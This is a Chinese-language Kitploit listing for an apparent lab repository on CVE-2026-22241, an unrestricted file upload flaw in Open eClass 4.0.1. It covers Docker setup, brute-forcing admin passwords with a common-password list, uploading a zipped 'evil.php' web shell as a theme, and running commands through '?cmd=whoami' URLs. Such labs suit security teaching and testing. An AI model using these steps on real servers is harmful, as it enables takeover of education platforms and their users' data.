Skip to content
KitploitKITPLOIT
工具博客
Log in
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-22241 — CVE-2026-22241 的实验环境 | Kitploit
工具/GitHubGitHub/cves-labs/cve-2026-22241
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育实验室与实践
GitHubcves-labs/cve-2026-22241

CVE-2026-22241

CVE-2026-22241 的实验环境

查看仓库
523个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-22241

CVE-2026-22241 实验环境

漏洞描述:

  • 漏洞:危险类型文件无限制上传。
  • 影响:远程代码执行(RCE)。
  • 描述:该漏洞允许具有管理员权限的攻击者上传恶意 PHP 文件(Web Shell),从而导致 Web 服务器的完整性和安全性完全受损。
  • 目标系统:OpenClass 教育基础设施。

1. 构建环境

sudo git clone https://github.com/CVEs-Labs/CVE-2026-22241.git

打开 https://www.openeclass.org/en/previous-versions/ 并下载 openeclass-4.0.1.zip

sudo apt update && sudo apt install docker.io docker-compose -y

sudo systemctl start docker

sudo cp openeclass-4.0.1.zip CVE-2026-22241

cd CVE-2026-22241

sudo mkdir html

sudo unzip openeclass-4.0.1.zip -d ./temp_folder

sudo mv ./temp_folder/openeclass-4.0.1/* ./html/

sudo rm -rf ./temp_folder

sudo rm -rf openeclass-4.0.1.zip

sudo chown -R $USER:www-data html/

sudo chmod -R 775 html/

sudo docker-compose up -d

sudo docker exec -it eclass-web bash -c "apt-get update && apt-get install -y libpng-dev libzip-dev libicu-dev libxml2-dev libldap2-dev && docker-php-ext-configure ldap --with-libdir=lib/x86_64-linux-gnu/ && docker-php-ext-install zip gd pdo pdo_mysql intl soap ldap && apache2ctl restart"

sudo docker inspect -f '{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' eclass-web

http://ip-docker

image

2. 漏洞利用:

ZAP 中的密钥列表(暴力破解):
https://gitlab.com/kalilinux/packages/seclists/-/blob/kali/master/Passwords/Common-Credentials/Pwdb_top-1000.txt

zip poc.zip evil.php

在 eclass 页面:
进入管理工具 -> 主题设置 -> 然后上传 poc.zip

在新页面中:

http://ip-docker/courses/theme_data/evil.php?cmd=whoami

http://ip-docker/courses/theme_data/evil.php?cmd=id

下载工具